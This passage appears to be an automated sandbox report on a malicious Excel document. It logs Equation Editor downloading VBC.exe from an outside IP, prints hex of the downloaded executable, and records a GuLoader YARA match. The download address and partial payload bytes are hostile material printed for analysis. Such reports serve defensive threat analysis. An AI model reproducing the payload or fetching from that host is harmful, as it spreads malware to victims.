                                              Nov 29, 2022 08:13:06.224320889 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.225447893 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336641073 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336679935 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336699009 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336718082 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336725950 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336738110 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336756945 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336776972 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336786032 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336786032 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336786032 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336797953 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336807013 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336817980 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336823940 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336838007 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336846113 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336858988 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336869001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336879015 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336889029 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336899042 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336904049 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336914062 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336926937 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336945057 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336957932 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336971045 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336976051 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.336988926 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.336996078 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.337008953 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.337013960 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.337028980 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.337033033 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.337047100 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.337049961 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.337066889 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.337086916 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.337095976 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.337095976 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.337109089 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.337126970 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.338113070 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.339504957 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.339534998 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.339551926 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.339570999 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.339590073 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.339608908 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.339617014 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.339627981 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.339643002 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.339660883 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.339678049 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.339818001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345240116 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345278978 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345298052 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345316887 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345315933 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345335960 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345351934 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345351934 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345356941 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345366001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345377922 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345391989 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345397949 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345417976 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345437050 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345453978 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345472097 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345489979 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345508099 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345525980 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345539093 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345539093 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345539093 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345539093 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345540047 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345540047 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345544100 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345540047 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345540047 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345566034 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345571995 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345571995 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345585108 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345598936 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345604897 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345611095 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345623970 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345629930 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345643044 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345645905 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345662117 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345669031 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345681906 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345686913 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345701933 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345706940 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345721006 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345724106 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345738888 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345741987 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345757008 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345761061 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345776081 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345777988 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345796108 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345798016 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345813036 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345828056 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345844984 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345864058 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345880032 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345882893 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345899105 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345910072 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345916986 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345927000 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345936060 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345943928 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345954895 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345966101 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345973015 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.345983028 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.345993042 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346000910 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346013069 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346020937 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346030951 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346045971 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346050024 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346065998 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346080065 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346093893 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346128941 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346146107 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346147060 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346167088 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346167088 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346184969 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346194029 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346204042 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346213102 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346224070 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346232891 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346244097 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346249104 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346263885 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346267939 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346282959 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346290112 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346304893 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346318007 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346323013 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346328974 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346342087 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346349001 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346360922 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346369982 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346379995 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346389055 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346400023 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346405983 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346419096 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.346426010 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346441031 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.346457958 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.347217083 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.347239017 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.347251892 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.347265005 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.347278118 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.347291946 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.347305059 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.347316980 CET8049173172.245.34.91192.168.2.22
                                              Nov 29, 2022 08:13:06.347445965 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:06.347642899 CET4917380192.168.2.22172.245.34.91
                                              Nov 29, 2022 08:13:08.286144972 CET4917380192.168.2.22172.245.34.91
                                              • 172.245.34.91
                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.2249173172.245.34.9180C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              TimestampkBytes transferredDirectionData
                                              Nov 29, 2022 08:13:05.476435900 CET0OUTGET /5643/VBC.exe HTTP/1.1
                                              Accept: */*
                                              Accept-Encoding: gzip, deflate
                                              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                              Host: 172.245.34.91
                                              Connection: Keep-Alive
                                              Nov 29, 2022 08:13:05.603394032 CET1INHTTP/1.1 200 OK
                                              Date: Tue, 29 Nov 2022 07:13:05 GMT
                                              Server: Apache/2.4.54 (Win64) OpenSSL/1.1.1p PHP/7.4.33
                                              Last-Modified: Tue, 29 Nov 2022 05:24:03 GMT
                                              ETag: "74a68-5ee95323a363c"
                                              Accept-Ranges: bytes
                                              Content-Length: 477800
                                              Keep-Alive: timeout=5, max=100
                                              Connection: Keep-Alive
                                              Content-Type: application/x-msdownload
                                              Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ad 31 e8 81 e9 50 86 d2 e9 50 86 d2 e9 50 86 d2 2a 5f d9 d2 eb 50 86 d2 e9 50 87 d2 4f 50 86 d2 2a 5f db d2 e6 50 86 d2 bd 73 b6 d2 e3 50 86 d2 2e 56 80 d2 e8 50 86 d2 52 69 63 68 e9 50 86 d2 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 38 ca 4d 58 00 00 00 00 00 00 00 00 e0 00 0f 01 0b 01 06 00 00 62 00 00 00 2a 02 00 00 08 00 00 4a 34 00 00 00 10 00 00 00 80 00 00 00 00 40 00 00 10 00 00 00 02 00 00 04 00 00 00 06 00 00 00 04 00 00 00 00 00 00 00 00 70 09 00 00 04 00 00 17 86 07 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 04 85 00 00 a0 00 00 00 00 e0 06 00 68 88 02 00 00 00 00 00 00 00 00 00 10 35 07 00 58 15 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 b4 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 f1 61 00 00 00 10 00 00 00 62 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 a4 13 00 00 00 80 00 00 00 14 00 00 00 66 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 38 03 02 00 00 a0 00 00 00 06 00 00 00 7a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 6e 64 61 74 61 00 00 00 30 04 00 00 b0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 c0 2e 72 73 72 63 00 00 00 68 88 02 00 00 e0 06 00 00 8a 02 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                              Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1PPP*_PPOP*_PsP.VPRichPPEL8MXb*J4@p@h5X.textab `.rdataf@@.data8z@.ndata0.rsrch@@
                                              Nov 29, 2022 08:13:05.603449106 CET3INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 5c 83 7d 0c 0f 74 2b 83 7d
                                              Data Ascii: U\}t+}FEuHHBHPuuu$@BSV5PBEWPu(@eEEPu,@}e\@FRVVU+MM3FQNUMVT
                                              Nov 29, 2022 08:13:05.603480101 CET4INData Raw: c3 fe ff ff e9 1b 16 00 00 53 50 e8 9f 3e 00 00 e9 04 16 00 00 53 e8 54 17 00 00 83 f8 01 59 89 55 b0 7f 03 33 c0 40 50 ff 15 7c 80 40 00 e9 e6 15 00 00 ff 75 f8 ff 15 98 82 40 00 e9 d8 15 00 00 c1 e0 02 39 5d e0 75 26 8b 88 c0 a2 42 00 6a 01 89
                                              Data Ascii: SP>STYU3@P|@u@9]u&BjBYUMBBBE4B3;#MDE4BVB5h@;tuQE$B;APQ8juP@
                                              Nov 29, 2022 08:13:05.603504896 CET5INData Raw: 8b 45 c8 8d 04 78 50 56 e8 3d 48 00 00 39 5d 08 7d 0e 56 e8 48 48 00 00 01 45 08 79 03 89 5d 08 8b 45 08 3d 00 04 00 00 0f 8d e5 10 00 00 66 89 1c 46 e9 dc 10 00 00 6a 20 e8 4d 12 00 00 6a 31 8b f0 e8 44 12 00 00 39 5d e8 50 56 75 12 ff 15 18 81
                                              Data Ascii: ExPV=H9]}VHHEy]E=fFj Mj1D9]PVu@uzE(@3GWhVPE$@t9]tVu(@u}ffiSjU9]YYUu;|~;sEDxE6jzj
                                              Nov 29, 2022 08:13:05.603530884 CET7INData Raw: 00 00 e9 cc 09 00 00 53 e8 78 0d 00 00 8b f0 56 6a eb e8 8c 34 00 00 56 e8 07 3a 00 00 3b c3 89 45 08 0f 84 ab 09 00 00 39 5d e0 74 4f 8b 35 b8 80 40 00 6a 64 50 ff d6 bf 02 01 00 00 eb 0e 6a 0f e8 14 47 00 00 6a 64 ff 75 08 ff d6 3b c7 74 ee 8d
                                              Data Ascii: SxVj4V:;E9]tO5@jdPjGjdu;tEPu8@9]|uuB9]tEu @jPE;twuAwEffjMEQPjJFEf;fEWj@
                                              Nov 29, 2022 08:13:05.603557110 CET8INData Raw: 00 50 e8 b8 08 00 00 8b f8 3b fb 0f 84 f6 06 00 00 e9 b7 04 00 00 50 e8 58 09 00 00 8b 75 e8 8b f8 8b 45 ec 6a 02 89 45 b0 e8 51 08 00 00 6a 11 89 45 c8 e8 47 08 00 00 8d 4d 08 53 51 8b 0d f0 a2 42 00 83 c9 02 53 51 53 53 53 50 57 c7 45 fc 01 00
                                              Data Ascii: P;PXuEjEQjEGMSQBSQSSSPWE$@@uj#W=DujY@VUXuhWSuPWuSuu(@u]uhj3;fMEQ
                                              Nov 29, 2022 08:13:05.603585005 CET9INData Raw: 00 00 85 c0 75 07 6a ed e8 6c 03 00 00 56 e8 d5 34 00 00 6a 02 68 00 00 00 40 56 e8 ed 34 00 00 83 f8 ff 89 45 08 0f 84 97 00 00 00 a1 54 a2 42 00 8b 35 0c 81 40 00 50 6a 40 89 45 c8 ff d6 8b f8 3b fb 74 75 53 e8 dd 0a 00 00 ff 75 c8 57 e8 be 0a
                                              Data Ascii: ujlV4jh@V4ETB5@Pj@E;tuSuWuj@;ut4uVSu0FQVPM@4u8uu@uWu5W@SSujEu @9]j^}j^uD@EVSmY;=lB
                                              Nov 29, 2022 08:13:05.603611946 CET11INData Raw: 20 a0 40 00 50 8d 45 80 51 50 ff 15 e0 81 40 00 83 c4 0c 8d 45 80 50 ff 75 08 ff 15 60 82 40 00 8d 45 80 50 68 06 04 00 00 ff 75 08 e8 24 2b 00 00 33 c0 c9 c2 10 00 8b 0d d0 8e 41 00 a1 e0 8e 41 00 3b c8 7c 02 8b c8 50 6a 64 51 ff 15 54 81 40 00
                                              Data Ascii: @PEQP@EPu`@EPhu$+3AA;|PjdQT@UV39utA;tPT@5Av95AtV7f@;LBvX95HBt-BtGPEh@P@EPV$#Vh-@Vjo5@B@jPAh@^
                                              Nov 29, 2022 08:13:05.603638887 CET12INData Raw: bf 00 40 00 00 2b 05 e4 8e 41 00 3b c7 7f 02 8b f8 be d0 4e 41 00 57 56 e8 e9 00 00 00 85 c0 0f 84 c2 00 00 00 01 3d e4 8e 41 00 89 35 60 ce 40 00 89 3d 64 ce 40 00 39 1d 50 a2 42 00 74 29 39 1d e0 a2 42 00 75 21 a1 e0 8e 41 00 53 2b 05 d4 8e 41
                                              Data Ascii: @+A;NAWV=A5`@=d@9PBt)9Bu!AS+A+D$@@AYH@-h@l@3|j5h@+t!VU5@+tK5@@9d@u9d@u7;t3A+@@L$%SSP5@H@jjX
                                              Nov 29, 2022 08:13:05.603666067 CET13INData Raw: 2a 00 00 bd 00 68 43 00 55 56 ff 15 18 81 40 00 85 c0 74 97 3b fb 56 74 07 e8 36 20 00 00 eb 05 e8 ac 20 00 00 56 ff 15 70 80 40 00 66 39 1d 00 58 43 00 75 0b 55 68 00 58 43 00 e8 e6 29 00 00 ff 74 24 18 68 00 b0 42 00 e8 d8 29 00 00 0f b7 05 16
                                              Data Ascii: *hCUV@t;Vt6 Vp@f9XCuUhXC)t$hB)@@jB]BPB W)WD@9\$t?jWhC@t-SW"(PB$W)WJ ;tP @\$fBMuSV'9Bt|D$Pj(
                                              Nov 29, 2022 08:13:05.724899054 CET15INData Raw: ff 6a 01 e8 b1 fc ff ff 8b c6 eb 2b 57 e8 40 17 00 00 85 c0 74 18 39 3d 0c 92 42 00 0f 85 4e ff ff ff 6a 02 e8 f0 d6 ff ff e9 42 ff ff ff 6a 01 e8 e4 d6 ff ff 33 c0 5f 5e 5d 5b 83 c4 10 c3 53 55 56 57 bf 00 70 43 00 bb ff ff 00 00 57 e8 2d 24 00
                                              Data Ascii: j+W@t9=BNjBj3_^][SUVWpCW-$5BtEPBIdBNf)f3#ftuQ BQBQufu3BPW#jh@Br$P57B`@lB5hBtt


                                              Click to jump to process

                                              Click to jump to process

                                              Click to dive into process behavior distribution

                                              Click to jump to process

                                              Target ID:0
                                              Start time:08:12:24
                                              Start date:29/11/2022
                                              Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                              Wow64 process (32bit):false
                                              Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                              Imagebase:0x13f8d0000
                                              File size:28253536 bytes
                                              MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:2
                                              Start time:08:12:45
                                              Start date:29/11/2022
                                              Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                              Imagebase:0x400000
                                              File size:543304 bytes
                                              MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:high

                                              Target ID:5
                                              Start time:08:12:50
                                              Start date:29/11/2022
                                              Path:C:\Users\Public\vbc.exe
                                              Wow64 process (32bit):true
                                              Commandline:"C:\Users\Public\vbc.exe"
                                              Imagebase:0x400000
                                              File size:477800 bytes
                                              MD5 hash:7081C4822CF1C7572DD82822B8F27C49
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Yara matches:
                                              • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000005.00000002.1187007837.00000000030C0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                              Reputation:low

                                              Call Graph

                                              • Entrypoint
                                              • Decryption Function
                                              • Executed
                                              • Not Executed
                                              • Show Help
                                              callgraph 1 Error: Graph is empty

                                              Module: Sheet1

                                              Declaration
                                              LineContent
                                              1

                                              Attribute VB_Name = "Sheet1"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              9

                                              Attribute VB_Name = "Sheet1"

                                              10

